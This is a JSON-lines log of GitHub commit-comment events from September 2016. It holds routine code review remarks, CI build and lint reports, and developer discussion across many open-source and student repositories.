{"id":"4576660420","type":"CommitCommentEvent","actor":{"login":"lucasrangit"},"repo":{"name":"analogdevicesinc/libiio"},"payload":{"comment":{"id":19061040,"position":null,"line":null,"path":null,"commit_id":"463edc7c28c41d85df55cc8299c9fb0f220b2171","created_at":"2016-09-16T22:19:59Z","updated_at":"2016-09-16T22:19:59Z","body":"Congratulations on reaching the 1000th commit!"}},"created_at":"2016-09-16T22:19:59Z"}
{"id":"4576660760","type":"CommitCommentEvent","actor":{"login":"vldmkr"},"repo":{"name":"bitsybits/ujkl-lisp"},"payload":{"comment":{"id":19061041,"position":null,"line":null,"path":null,"commit_id":"f2ecab42bcb991396ed3d5eaf1b402ec2ecec055","created_at":"2016-09-16T22:20:06Z","updated_at":"2016-09-16T22:20:06Z","body":"ujkl.h is almost entirely copied from the main.c"}},"created_at":"2016-09-16T22:20:06Z"}
{"id":"4576660855","type":"CommitCommentEvent","actor":{"login":"nrel-bot-3"},"repo":{"name":"NREL/OpenStudio"},"payload":{"comment":{"id":19061042,"position":null,"line":null,"path":null,"commit_id":"1d27337d576a6de733804a35b7b0ef1627f8f501","created_at":"2016-09-16T22:20:08Z","updated_at":"2016-09-16T22:20:08Z","body":"os_2_0_develop_linux (macumber) - x86_64-MacOS-10.10-clang: Build Failed\n\n\n\n<a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-1d27337d576a6de733804a35b7b0ef1627f8f501-x86_64-MacOS-10.10-clang.html'>![Build Badge](http://img.shields.io/badge/build%20status-failing-red.svg)</a> <a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-1d27337d576a6de733804a35b7b0ef1627f8f501-x86_64-MacOS-10.10-clang.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-NA-red.svg)</a> \n"}},"created_at":"2016-09-16T22:20:08Z"}
{"id":"4576663273","type":"CommitCommentEvent","actor":{"login":"PicassoCT"},"repo":{"name":"spring/spring"},"payload":{"comment":{"id":19061046,"position":null,"line":null,"path":null,"commit_id":"ded04ec7db578c651df95986a974ecd5feb38b66","created_at":"2016-09-16T22:20:46Z","updated_at":"2016-09-16T22:20:46Z","body":"Bravo!"}},"created_at":"2016-09-16T22:20:46Z"}
{"id":"4576666684","type":"CommitCommentEvent","actor":{"login":"barryross"},"repo":{"name":"mareyc/final-project"},"payload":{"comment":{"id":19061057,"position":17,"line":17,"path":"eat.html","commit_id":"1283211c57b335cc18efcdfdbd48dc155eb4a412","created_at":"2016-09-16T22:21:45Z","updated_at":"2016-09-16T22:21:45Z","body":"I would suggest using the following structure for your nav...and leveraging inline-block, like we did in class on Wed, rather than the `<span>` elements.  We don't often see `<span>` elements used for menu items.\r\n   <ul>\r\n   <li><a>link name</a>\r\n  </li>\r\n</ul>"}},"created_at":"2016-09-16T22:21:45Z"}
{"id":"4576666767","type":"CommitCommentEvent","actor":{"login":"jenkins-plone-org"},"repo":{"name":"plone/plone.namedfile"},"payload":{"comment":{"id":19061058,"position":null,"line":null,"path":null,"commit_id":"f29a798a30cd97dc6ab9721d001094804bfe854a","created_at":"2016-09-16T22:21:46Z","updated_at":"2016-09-16T22:21:46Z","body":"@loechel Jenkins CI reporting about code analysis\nSee the full report here: http://jenkins.plone.org/job/package-plone.namedfile/50/violations\n```\nplone/namedfile/file.py:5:1: F401 'StringIO' imported but unused\nplone/namedfile/scaling.py:173:1: C901 'DefaultImageScalingFactory.__call__' is too complex (13)\nplone/namedfile/utils/__init__.py:9:1: F401 'FileUpload' imported but unused\nplone/namedfile/utils/__init__.py:141:13: E265 block comment should start with '# '\nplone/namedfile/utils/__init__.py:159:29: F841 local variable 'e' is assigned to but never used\nplone/namedfile/utils/__init__.py:171:1: C901 'rotate_image' is too complex (17)\nplone/namedfile/utils/__init__.py:233:5: B901 blind except: statement\nplone/namedfile/utils/jpeg_utils.py:0:1: I001 isort found changes, run it on the file\nplone/namedfile/utils/png_utils.py:0:1: I001 isort found changes, run it on the file\nplone/namedfile/utils/png_utils.py:4:1: F401 'StringIO' imported but unused\nplone/namedfile/utils/tiff_utils.py:0:1: I001 isort found changes, run it on the file\nplone/namedfile/utils/tiff_utils.py:34:22: Q000 Remove bad quotes.\nplone/namedfile/utils/tiff_utils.py:37:22: Q000 Remove bad quotes.\nplone/namedfile/utils/tiff_utils.py:40:22: Q000 Remove bad quotes.\nplone/namedfile/utils/tiff_utils.py:72:1: C901 '_translate_field_type' is too complex (13)\nplone/namedfile/utils/tiff_utils.py:97:80: E501 line too long (89 > 79 characters)\nplone/namedfile/utils/tiff_utils.py:99:80: E501 line too long (88 > 79 characters)\n```\nFollow [these instructions](https://github.com/plone/jenkins.plone.org/blob/master/docs/source/run-qa-on-package.rst) to reproduce it locally."}},"created_at":"2016-09-16T22:21:46Z"}
{"id":"4576666998","type":"CommitCommentEvent","actor":{"login":"asr"},"repo":{"name":"agda/agda"},"payload":{"comment":{"id":19061059,"position":null,"line":null,"path":null,"commit_id":"fecc19d3e5cb287652842a75f5f13bd44531215e","created_at":"2016-09-16T22:21:50Z","updated_at":"2016-09-16T22:21:50Z","body":"Oops, thanks!"}},"created_at":"2016-09-16T22:21:50Z"}
{"id":"4576667412","type":"CommitCommentEvent","actor":{"login":"AirwavesMan"},"repo":{"name":"EpochModTeam/DayZ-Epoch"},"payload":{"comment":{"id":19061062,"position":null,"line":null,"path":null,"commit_id":"e8e5d24e80f77268c8befa38680ccd9de6c03452","created_at":"2016-09-16T22:21:58Z","updated_at":"2016-09-16T22:21:58Z","body":"I thought the same and tested it on a lot different places on tavi. Almost every street and city with a special texture has that problem. I dont mean it happen sometimes, it happend all the time. Sabina or the airfields are the best examples. Try it out. This fix does not work properly on that map. We need something additional like the first fix for that map."}},"created_at":"2016-09-16T22:21:58Z"}
{"id":"4576667826","type":"CommitCommentEvent","actor":{"login":"barryross"},"repo":{"name":"mareyc/final-project"},"payload":{"comment":{"id":19061063,"position":15,"line":15,"path":"eat.html","commit_id":"1283211c57b335cc18efcdfdbd48dc155eb4a412","created_at":"2016-09-16T22:22:06Z","updated_at":"2016-09-16T22:22:06Z","body":"I suggest using an h1 for this first header"}},"created_at":"2016-09-16T22:22:06Z"}
{"id":"4576668298","type":"CommitCommentEvent","actor":{"login":"LucDemortier"},"repo":{"name":"choiboy9106/dsp"},"payload":{"comment":{"id":19061064,"position":null,"line":null,"path":null,"commit_id":"f76a44598162f6c5efae4c05ae355838cacba0aa","created_at":"2016-09-16T22:22:14Z","updated_at":"2016-09-16T22:22:14Z","body":"RE: 05b-python_advanced.md\r\ncc: @lucdemortier @reshamametis @aramnath @gfsoileau @julialintern @galvin-mj\r\n\r\nHello @choiboy9106 \r\n\r\nNice effort with advanced Python! Some comments:\r\n- Q1-4: Please review regular expressions, they should be used here. In Q1 for example, you'd like to count `Ph.D.`, `PhD`, and `PhD.` as identical degrees.\r\n- Also, your formatting in Pandas columns isn't quite working as intended...\r\n- In Q5, don't forget to close a file that you opened with `f = open('faculty.csv')`.\r\n- In Q5, you haven't initialized `emails`.\r\n- In Q5, you are writing `email_list` to the output file, but you haven't created `email_list`.\r\n- For Q6-8, I didn't find your code for `advanced_python_dict.py`.\r\n\r\nCheers!"}},"created_at":"2016-09-16T22:22:14Z"}
{"id":"4576672447","type":"CommitCommentEvent","actor":{"login":"CheeseCast"},"repo":{"name":"Cheeselab/Cheese.synth"},"payload":{"comment":{"id":19061082,"position":null,"line":null,"path":null,"commit_id":"1746824652bdb50766d6c70706f4227f55c03911","created_at":"2016-09-16T22:23:30Z","updated_at":"2016-09-16T22:23:30Z","body":"Just to clarify, this is search functionality for .id command. Not search functionality for the .search command. "}},"created_at":"2016-09-16T22:23:30Z"}
{"id":"4576672497","type":"CommitCommentEvent","actor":{"login":"barryross"},"repo":{"name":"mareyc/final-project"},"payload":{"comment":{"id":19061083,"position":30,"line":30,"path":"eat.html","commit_id":"1283211c57b335cc18efcdfdbd48dc155eb4a412","created_at":"2016-09-16T22:23:30Z","updated_at":"2016-09-16T22:23:30Z","body":"I would be inclined to use <section> elements here instead of <article> elements, unless you think the content would be able to \"stand on its own\"...if you received it in an email or on a printed page, for example.  Also, I would use h2 tags instead of h3, to keep the hierarchy consistent if you do change the first one from an h1 to an h2.  Great job laying this out though!  👍 "}},"created_at":"2016-09-16T22:23:30Z"}
{"id":"4576673263","type":"CommitCommentEvent","actor":{"login":"BruceKnowsHow"},"repo":{"name":"BruceKnowsHow/Ebin-Shaders"},"payload":{"comment":{"id":19061087,"position":null,"line":null,"path":null,"commit_id":"734ca42bbe611ec05107bf360494463d73361fee","created_at":"2016-09-16T22:23:45Z","updated_at":"2016-09-16T22:23:45Z","body":"Meant to say \"orthographic\" rather than \"orthogonal\""}},"created_at":"2016-09-16T22:23:45Z"}
{"id":"4576673629","type":"CommitCommentEvent","actor":{"login":"kthakk4"},"repo":{"name":"kthakk4/coursera_data_cleaning_assignment"},"payload":{"comment":{"id":19061089,"position":null,"line":null,"path":null,"commit_id":"d7afd6973e6961d54debf23a2efa2f07ea8a2b1e","created_at":"2016-09-16T22:23:51Z","updated_at":"2016-09-16T22:23:51Z","body":"Final data set"}},"created_at":"2016-09-16T22:23:51Z"}
{"id":"4576673956","type":"CommitCommentEvent","actor":{"login":"archana-bajaj"},"repo":{"name":"ShawnHan1993/homework1ForEC601"},"payload":{"comment":{"id":19061090,"position":null,"line":null,"path":null,"commit_id":"19a31472485255090934a1548153d3cdc7e244a6","created_at":"2016-09-16T22:23:56Z","updated_at":"2016-09-16T22:23:56Z","body":"My code with a new input"}},"created_at":"2016-09-16T22:23:56Z"}
{"id":"4576674558","type":"CommitCommentEvent","actor":{"login":"jdashg"},"repo":{"name":"kenrussell/WebGL"},"payload":{"comment":{"id":19061091,"position":null,"line":null,"path":null,"commit_id":"d4538b4ef099956093f6252d9f7b62a9d560a536","created_at":"2016-09-16T22:24:07Z","updated_at":"2016-09-16T22:24:07Z","body":"I would be more fine with this being _ETC2, which while not strictly accurate, is close enough.\r\nAlternatively, I think ES3_0 would be better than having both _ETC1 and _ETC."}},"created_at":"2016-09-16T22:24:07Z"}
{"id":"4576675667","type":"CommitCommentEvent","actor":{"login":"barryross"},"repo":{"name":"mareyc/final-project"},"payload":{"comment":{"id":19061093,"position":119,"line":119,"path":"css/style.css","commit_id":"1283211c57b335cc18efcdfdbd48dc155eb4a412","created_at":"2016-09-16T22:24:27Z","updated_at":"2016-09-16T22:24:27Z","body":"Nice work using relative units here!"}},"created_at":"2016-09-16T22:24:27Z"}
{"id":"4576683526","type":"CommitCommentEvent","actor":{"login":"ybbxgb"},"repo":{"name":"ybbxgb/-"},"payload":{"comment":{"id":19061109,"position":null,"line":null,"path":null,"commit_id":"fb999f3af81bf0563cc7d93fcc8598b1f835e705","created_at":"2016-09-16T22:26:44Z","updated_at":"2016-09-16T22:26:44Z","body":"git@github.com:ybbxgb/-.git"}},"created_at":"2016-09-16T22:26:44Z"}
{"id":"4576693017","type":"CommitCommentEvent","actor":{"login":"adamschwartz"},"repo":{"name":"EagerIO/EmbedBox"},"payload":{"comment":{"id":19061128,"position":null,"line":null,"path":null,"commit_id":"e29ac86c0ba2e7549c55287c7a9bafb919cb1f5d","created_at":"2016-09-16T22:29:26Z","updated_at":"2016-09-16T22:29:26Z","body":"So does this actually work now? How does one go about running this test?"}},"created_at":"2016-09-16T22:29:26Z"}
{"id":"4576693457","type":"CommitCommentEvent","actor":{"login":"barryross"},"repo":{"name":"amy-b/finalProject"},"payload":{"comment":{"id":19061131,"position":49,"line":49,"path":"css/index.css","commit_id":"460f5de1ee88377109bd03028b20f63f4736e6da","created_at":"2016-09-16T22:29:33Z","updated_at":"2016-09-16T22:29:33Z","body":"Try giving each of these a width of 30-33.3% (depending on margin), and if you do that, you shouldn't have to \"clear\" .card-four"}},"created_at":"2016-09-16T22:29:33Z"}
{"id":"4576696592","type":"CommitCommentEvent","actor":{"login":"barryross"},"repo":{"name":"amy-b/finalProject"},"payload":{"comment":{"id":19061137,"position":17,"line":17,"path":"index.html","commit_id":"460f5de1ee88377109bd03028b20f63f4736e6da","created_at":"2016-09-16T22:30:27Z","updated_at":"2016-09-16T22:30:27Z","body":"I would suggest wrapping the <p> tag in a <div class=\"instructions\"> tag...that way you can add another paragraph later on, and it is easier to style <p> tags when they are within a parent element we can easily target.  "}},"created_at":"2016-09-16T22:30:27Z"}
{"id":"4576702192","type":"CommitCommentEvent","actor":{"login":"barryross"},"repo":{"name":"amy-b/finalProject"},"payload":{"comment":{"id":19061151,"position":29,"line":29,"path":"index.html","commit_id":"460f5de1ee88377109bd03028b20f63f4736e6da","created_at":"2016-09-16T22:32:03Z","updated_at":"2016-09-16T22:32:03Z","body":"You may find it easier if you keep the common \"game-card\" class on  the cards, and give them each a unique id, like  \"one\", \"two\", \"three\" etc.  Then you can easily grab the ID of whichever was clicked, without having to filter through multiple class names.  Nice job leveraging multiple class names though!"}},"created_at":"2016-09-16T22:32:03Z"}
{"id":"4576708985","type":"CommitCommentEvent","actor":{"login":"un1versal"},"repo":{"name":"kvirc/KVIrc"},"payload":{"comment":{"id":19061163,"position":null,"line":null,"path":null,"commit_id":"f8f50bd6a787fdae7ce03cc36f97068399700d66","created_at":"2016-09-16T22:34:00Z","updated_at":"2016-09-16T22:34:00Z","body":"this fixes nothing the real issue is caused by #1959\r\n \r\nThis fix of yours will do same thing,  people that upgrade and restore the events will have two events handlers one pre existing called URL popup and one called default which is what causes #2149\r\n\r\nWhat must have happened is that at some stage you touched the event handler triggering #1959 then at a later date you restored events causing tow handlers that call same ``` popup.show urlpopup $0 ``` which is what will continue happening.\r\n\r\n\r\n"}},"created_at":"2016-09-16T22:34:00Z"}
{"id":"4576709066","type":"CommitCommentEvent","actor":{"login":"TeffenEllis"},"repo":{"name":"EagerIO/EmbedBox"},"payload":{"comment":{"id":19061164,"position":null,"line":null,"path":null,"commit_id":"e29ac86c0ba2e7549c55287c7a9bafb919cb1f5d","created_at":"2016-09-16T22:34:02Z","updated_at":"2016-09-16T22:34:02Z","body":"It's completely manual unfortunately, more of a smoke test before making\nreleases.\n\nThere's a slightly better testing flow with the following instructions, but\nit needs TLC: https://github.com/EagerIO/EmbedBox#testing\n\nIdeally a test suite would run through all the demos in the site landing\npage since it features all the usual use-cases.\n\nOn Fri, Sep 16, 2016 at 3:29 PM, Adam Schwartz <notifications@github.com>\nwrote:\n\n> So does this actually work now? How does one go about running this test?\n>\n> —\n> You are receiving this because you authored the thread.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/EagerIO/EmbedBox/commit/e29ac86c0ba2e7549c55287c7a9bafb919cb1f5d#commitcomment-19061128>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/AAkJBttN_wZYRbGt4MkSjYIaj8SX9tZ7ks5qqxhGgaJpZM4J_Z3c>\n> .\n>\n\n\n\n-- \nTeffen Ellis\nProduct Engineer\n@TeffenEllis <https://twitter.com/TeffenEllis>\n"}},"created_at":"2016-09-16T22:34:02Z"}
{"id":"4576712765","type":"CommitCommentEvent","actor":{"login":"soumak77"},"repo":{"name":"base-apps/angular-base-apps-template"},"payload":{"comment":{"id":19061172,"position":23,"line":35,"path":"brunch-config.js","commit_id":"dce1642b0a106c6539ed993b0a11cd6b43c90fc0","created_at":"2016-09-16T22:35:10Z","updated_at":"2016-09-16T22:35:10Z","body":"this should really be handled by `.eslintignore` but for some reason that file isn't being read by the build"}},"created_at":"2016-09-16T22:35:10Z"}
{"id":"4576716487","type":"CommitCommentEvent","actor":{"login":"LucDemortier"},"repo":{"name":"choiboy9106/dsp"},"payload":{"comment":{"id":19061177,"position":null,"line":null,"path":null,"commit_id":"41b81c10fcdb39009177f1f3c1c7f004e288925c","created_at":"2016-09-16T22:36:15Z","updated_at":"2016-09-16T22:36:15Z","body":"RE: 06-linear_algebra.md\r\ncc: @lucdemortier @reshamametis @aramnath @gfsoileau @julialintern @galvin-mj\r\n\r\nHello @choiboy9106 \r\n\r\nGood work on the linear algebra problems! Note however that `A+C`, `B A.T`, and `B C` are not defined. Your code does not check for this. There is also a typo in your calculation of `D.T D`.\r\n\r\n👍 "}},"created_at":"2016-09-16T22:36:15Z"}
{"id":"4576721285","type":"CommitCommentEvent","actor":{"login":"DarthGandalf"},"repo":{"name":"kvirc/KVIrc"},"payload":{"comment":{"id":19061189,"position":null,"line":null,"path":null,"commit_id":"f8f50bd6a787fdae7ce03cc36f97068399700d66","created_at":"2016-09-16T22:37:44Z","updated_at":"2016-09-16T22:37:44Z","body":"Except that with this space it will be _2, then _3, then more and more warnings over time."}},"created_at":"2016-09-16T22:37:44Z"}
{"id":"4576725503","type":"CommitCommentEvent","actor":{"login":"ndavalos"},"repo":{"name":"EpochModTeam/DayZ-Epoch"},"payload":{"comment":{"id":19061201,"position":null,"line":null,"path":null,"commit_id":"e8e5d24e80f77268c8befa38680ccd9de6c03452","created_at":"2016-09-16T22:39:06Z","updated_at":"2016-09-16T22:39:06Z","body":"Well bummer, was hoping it would help :/\r\n\r\nSo would a combination of both fixes at least make it less of a pain? You could use one of the oils rigs in the north as a debug zone maybe for that map, just make a slight customization to deal with it.\r\n\r\nAs a side note, taviana is a horrible mod, there's so many problems with it, don't get me started! Lol\r\n\r\nShame no one can just fix it since everyone is so dependent on dayz launcher, and having to get it distributed (and dealing with the original author) would just not work out."}},"created_at":"2016-09-16T22:39:06Z"}
{"id":"4576727555","type":"CommitCommentEvent","actor":{"login":"lau"},"repo":{"name":"elixir-lang/elixir"},"payload":{"comment":{"id":19061208,"position":218,"line":758,"path":"lib/elixir/lib/calendar.ex","commit_id":"e50735ff2a7c16cc7705d8fa59af906e986c19f7","created_at":"2016-09-16T22:39:45Z","updated_at":"2016-09-16T22:39:45Z","body":"Yes I was thinking something like that too. Does to_integer describe enough though? to_unix on DateTime also returns an integer. How about these function names? Still with the precision arguments when applicable.\r\n\r\nTime.to_second_in_day\r\nTime.from_second_in_day\r\n\r\nDate.to_gregorian_days\r\nDate.from_gregorian_days\r\n\r\nNaiveDateTime.to_gregorian_seconds\r\nNaiveDateTime.from_gregorian_seconds\r\n\r\nAnd maybe for `DateTime` also to_gregorian_seconds which would do the same thing as the function in NaiveDateTime. Have you considered letting e.g. NaiveDateTime.to_gregorian_seconds accept a `DateTime` and this function definition would just ignore the non-naive parts of the DateTime struct.\r\n\r\nIf Ecto then has the epochs (e.g. diff between year 1970 and year 0) that it can then add/subtract, wouldn't that be enough to accomplish what you need? Again using the unix epoch outside of UTC is a \"custom\", non standard use so it would make sense that it would be in Ecto."}},"created_at":"2016-09-16T22:39:45Z"}
{"id":"4576728983","type":"CommitCommentEvent","actor":{"login":"kenrussell"},"repo":{"name":"kenrussell/WebGL"},"payload":{"comment":{"id":19061213,"position":null,"line":null,"path":null,"commit_id":"d4538b4ef099956093f6252d9f7b62a9d560a536","created_at":"2016-09-16T22:40:12Z","updated_at":"2016-09-16T22:40:12Z","body":"Renamed to WEBGL_compressed_texture_es3_0 instead in #2031. Please take another look."}},"created_at":"2016-09-16T22:40:12Z"}
{"id":"4576733288","type":"CommitCommentEvent","actor":{"login":"un1versal"},"repo":{"name":"kvirc/KVIrc"},"payload":{"comment":{"id":19061230,"position":null,"line":null,"path":null,"commit_id":"f8f50bd6a787fdae7ce03cc36f97068399700d66","created_at":"2016-09-16T22:41:27Z","updated_at":"2016-09-16T22:41:27Z","body":"wont matter much, you end up with two event handlers calling same popup even with this _fix_, that is what causes #2149 nothing else."}},"created_at":"2016-09-16T22:41:27Z"}
{"id":"4576735798","type":"CommitCommentEvent","actor":{"login":"lnxdx"},"repo":{"name":"lnxdx/lnxdx_acm_notebook"},"payload":{"comment":{"id":19061240,"position":112,"line":112,"path":"Dijkstra Using Adj List & priority_queue O(E log E).cpp","commit_id":"f5f10434fa990af996321f63cfd5cc1d1daaa2de","created_at":"2016-09-16T22:42:15Z","updated_at":"2016-09-16T22:42:15Z","body":"hi"}},"created_at":"2016-09-16T22:42:15Z"}
{"id":"4576736622","type":"CommitCommentEvent","actor":{"login":"CommanderMark"},"repo":{"name":"Regalis11/scpcb"},"payload":{"comment":{"id":19061242,"position":null,"line":null,"path":null,"commit_id":"e0cb4a4914de973e6294a125298dce8fabc9f201","created_at":"2016-09-16T22:42:31Z","updated_at":"2016-09-16T22:42:31Z","body":"@VaneBrain Can you not give these ambiguously short responses to everything? Why does the console need to be more difficult to access? This literally just removes 5 wasted seconds each game session re-enabling the console. Not to mention it makes debugging a pain to do.\r\n\r\n@Regalis11 Um, Shn sent me a PM explicitly saying you wanted the console state to not be saved. A screenshot of the PM is linked in this post.\r\n![screen shot 2016-09-16 at 6 41 25 pm](https://cloud.githubusercontent.com/assets/21148093/18603159/457478b8-7c3d-11e6-9f0e-937db76946d2.png)\r\n"}},"created_at":"2016-09-16T22:42:31Z"}
{"id":"4576743896","type":"CommitCommentEvent","actor":{"login":"nrel-bot-3"},"repo":{"name":"NREL/OpenStudio"},"payload":{"comment":{"id":19061260,"position":null,"line":null,"path":null,"commit_id":"31ef0948855ee10d0b673842f1a49287020b8072","created_at":"2016-09-16T22:44:36Z","updated_at":"2016-09-16T22:44:36Z","body":"os_2_0_develop_linux (macumber) - x86_64-MacOS-10.10-clang: Build Failed\n\n\n\n<a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-31ef0948855ee10d0b673842f1a49287020b8072-x86_64-MacOS-10.10-clang.html'>![Build Badge](http://img.shields.io/badge/build%20status-failing-red.svg)</a> <a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-31ef0948855ee10d0b673842f1a49287020b8072-x86_64-MacOS-10.10-clang.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-NA-red.svg)</a> \n"}},"created_at":"2016-09-16T22:44:36Z"}
{"id":"4576746861","type":"CommitCommentEvent","actor":{"login":"ryanflorence"},"repo":{"name":"ReactTraining/react-router"},"payload":{"comment":{"id":19061265,"position":null,"line":null,"path":null,"commit_id":"ab57fa8554e4d2efaeaf2dd0ab82ea6434bac5b5","created_at":"2016-09-16T22:45:29Z","updated_at":"2016-09-16T22:45:29Z","body":"I'm not convinced the use-cases this provides can't already be provided with Match:\r\n\r\n```js\r\n<Match pattern=\"/whatever\">\r\n  {({ matched }) => (\r\n    <li className={matched ? 'active' : '' }><Link to=\"/whatever\"/></li>\r\n  )}\r\n</Match>\r\n```\r\n\r\nAnd therefore just compose:\r\n\r\n```js\r\nconst LinkWithChildRender = ({ children, to, ...rest }) => (\r\n  <Match pattern={to}>\r\n    {({ matched }) => (\r\n      <Link to={to} children={children({ isActive: matched }))/>\r\n    )}\r\n  </Match>\r\n)\r\n```\r\n\r\nYes? No?"}},"created_at":"2016-09-16T22:45:29Z"}
{"id":"4576750201","type":"CommitCommentEvent","actor":{"login":"not-an-aardvark"},"repo":{"name":"crypto-browserify/timing-safe-equal"},"payload":{"comment":{"id":19061274,"position":31,"line":31,"path":"test.js","commit_id":"87571dcaabc094bed9ae4c967525f929770c7cd1","created_at":"2016-09-16T22:46:32Z","updated_at":"2016-09-16T22:46:32Z","body":"For what it's worth: The `crypto.timingSafeEqual` benchmark test was changed a bit [here](/nodejs/node/commit/c678ecbca0c9d18d6578fa2a65c9a4ab2a569744) to avoid flakiness from memory caching on different platforms. If you're pulling the test into this repo you might want to use the updated version."}},"created_at":"2016-09-16T22:46:32Z"}
{"id":"4576755561","type":"CommitCommentEvent","actor":{"login":"kuramaluka"},"repo":{"name":"mozilla-b2g/b2g-installer"},"payload":{"comment":{"id":19061288,"position":null,"line":null,"path":null,"commit_id":"546af4c2a7c27bd43112b6a3851873c6da2dbe00","created_at":"2016-09-16T22:48:16Z","updated_at":"2016-09-16T22:48:16Z","body":"Thank you, Titan :+1: Great job!"}},"created_at":"2016-09-16T22:48:16Z"}
{"id":"4576756953","type":"CommitCommentEvent","actor":{"login":"Oleiva"},"repo":{"name":"art07/RepositoryGoIT"},"payload":{"comment":{"id":19061293,"position":16,"line":16,"path":"GoIT_Project_1/src/module_5_homework/BookingComAPI.java","commit_id":"ab450d450535d429b69283ce9a2fa60c24196a6b","created_at":"2016-09-16T22:48:44Z","updated_at":"2016-09-16T22:48:44Z","body":"Не нужно передавать null. Если ты не хочешь добавлять поле, нужно создать соответствующий конструктор без этого поля."}},"created_at":"2016-09-16T22:48:44Z"}
{"id":"4576757329","type":"CommitCommentEvent","actor":{"login":"panchicore"},"repo":{"name":"cga-harvard/HHypermap"},"payload":{"comment":{"id":19061295,"position":null,"line":null,"path":null,"commit_id":"6cea23f411e871e69d6be00047f976f79d9d788a","created_at":"2016-09-16T22:48:51Z","updated_at":"2016-09-16T22:48:51Z","body":"mac os: brew install docker"}},"created_at":"2016-09-16T22:48:51Z"}
{"id":"4576759606","type":"CommitCommentEvent","actor":{"login":"Oleiva"},"repo":{"name":"art07/RepositoryGoIT"},"payload":{"comment":{"id":19061298,"position":36,"line":36,"path":"GoIT_Project_1/src/module_5_homework/BookingComAPI.java","commit_id":"ab450d450535d429b69283ce9a2fa60c24196a6b","created_at":"2016-09-16T22:49:34Z","updated_at":"2016-09-16T22:49:34Z","body":"Нужно вернуть  количество комнат вместо null"}},"created_at":"2016-09-16T22:49:34Z"}
{"id":"4576759841","type":"CommitCommentEvent","actor":{"login":"mendsley"},"repo":{"name":"bkaradzic/bgfx"},"payload":{"comment":{"id":19061301,"position":122,"line":3430,"path":"src/renderer_gl.cpp","commit_id":"80fcf1877769332b82b6603f28d14c424bb9cb8e","created_at":"2016-09-16T22:49:38Z","updated_at":"2016-09-16T22:49:38Z","body":"This should be fixed in https://github.com/bkaradzic/bgfx/pull/918"}},"created_at":"2016-09-16T22:49:38Z"}
{"id":"4576762171","type":"CommitCommentEvent","actor":{"login":"timdorr"},"repo":{"name":"ReactTraining/react-router"},"payload":{"comment":{"id":19061305,"position":null,"line":null,"path":null,"commit_id":"ab57fa8554e4d2efaeaf2dd0ab82ea6434bac5b5","created_at":"2016-09-16T22:50:25Z","updated_at":"2016-09-16T22:50:25Z","body":"If you don't want that Link to be an `a`, for instance. "}},"created_at":"2016-09-16T22:50:25Z"}
{"id":"4576768325","type":"CommitCommentEvent","actor":{"login":"jmcphers"},"repo":{"name":"rstudio/rstudio"},"payload":{"comment":{"id":19061327,"position":null,"line":null,"path":null,"commit_id":"19977e3171e49182d8ef1fa936517652ad71fada","created_at":"2016-09-16T22:52:25Z","updated_at":"2016-09-16T22:52:25Z","body":"@kevinushey feel free to sanity check this! The change isn't as large as it looks.\r\n\r\nThe largest part is a light refactor of the idle command infrastructure. It lived in the Ace editor, but while that gave it access to editor internals, it also left it without a good mechanism to retrieve higher-level metadata (such as the doc path on disk) while executing idle commands. I've lifted the idle command system into the editing target level, which gives it access to the document update sentinel. This also forces it to interact with the editor via the `DocDisplay` interface, but that turns out not to be a big deal (it was only using one private, easily promoted method).\r\n\r\nThe second change here is auto-previewing the images, which now relies on local update sentinel plumbing to resolve relative paths (I think this will be more reliable than extracting global state from the source window manager). After the document's been tokenized, we scan it for lines that look like Markdown images and preview those right away. "}},"created_at":"2016-09-16T22:52:25Z"}
{"id":"4576769827","type":"CommitCommentEvent","actor":{"login":"mekdev"},"repo":{"name":"rstacruz/mocha-clean"},"payload":{"comment":{"id":19061330,"position":null,"line":null,"path":null,"commit_id":"7fdd45ceb3a14e16ba08b243edf7492fd9395f0c","created_at":"2016-09-16T22:52:54Z","updated_at":"2016-09-16T22:52:54Z","body":"Thanks for maintaining this, we have found this very helpful in cleaning mocha and babel async/await"}},"created_at":"2016-09-16T22:52:54Z"}
{"id":"4576782716","type":"CommitCommentEvent","actor":{"login":"tootyta"},"repo":{"name":"titshacking/Luna"},"payload":{"comment":{"id":19061358,"position":6,"line":713,"path":"Server/CPUser.pm","commit_id":"966519c45956287c9eeb13a3aaba896b0bd8fb5a","created_at":"2016-09-16T22:57:09Z","updated_at":"2016-09-16T22:57:09Z","body":"s"}},"created_at":"2016-09-16T22:57:09Z"}
{"id":"4576783588","type":"CommitCommentEvent","actor":{"login":"MOVZX"},"repo":{"name":"khanfrd/android_kernel_xiaomi_kenzo"},"payload":{"comment":{"id":19061362,"position":5,"line":610,"path":"arch/arm64/mm/mmu.c","commit_id":"d9ded6702ac3e0f4be9928ffacb6f8d273db67ad","created_at":"2016-09-16T22:57:26Z","updated_at":"2016-09-16T22:57:26Z","body":"dsb(ishst); = _(Store-Store)_\r\nWhy not dsb(sy); = _(Any-Any)_\r\n\r\nReference: http://infocenter.arm.com/help/index.jsp?topic=/com.arm.doc.ddi0488d/CIHFCFEJ.html"}},"created_at":"2016-09-16T22:57:26Z"}
{"id":"4576790555","type":"CommitCommentEvent","actor":{"login":"mranostay"},"repo":{"name":"networkimprov/linux"},"payload":{"comment":{"id":19061379,"position":23,"line":1231,"path":"drivers/power/bq24190_charger.c","commit_id":"280d3a3a5e3cc20281ec4f682fd2f086ecfdc33b","created_at":"2016-09-16T22:59:39Z","updated_at":"2016-09-16T22:59:39Z","body":"Doesn't need to be an array. Don't have it static and within a function."}},"created_at":"2016-09-16T22:59:39Z"}
{"id":"4576797324","type":"CommitCommentEvent","actor":{"login":"barryross"},"repo":{"name":"qtngo/homework_portfolio"},"payload":{"comment":{"id":19061401,"position":105,"line":105,"path":"project-milestone-02/css/style.css","commit_id":"4e9eb14f585fbf7304642ac1934676d5461fd396","created_at":"2016-09-16T23:01:50Z","updated_at":"2016-09-16T23:01:50Z","body":"How might you be able to use the :first-letter selector instead of wrapping the letter in a <span> to achieve what you are looking for? "}},"created_at":"2016-09-16T23:01:50Z"}
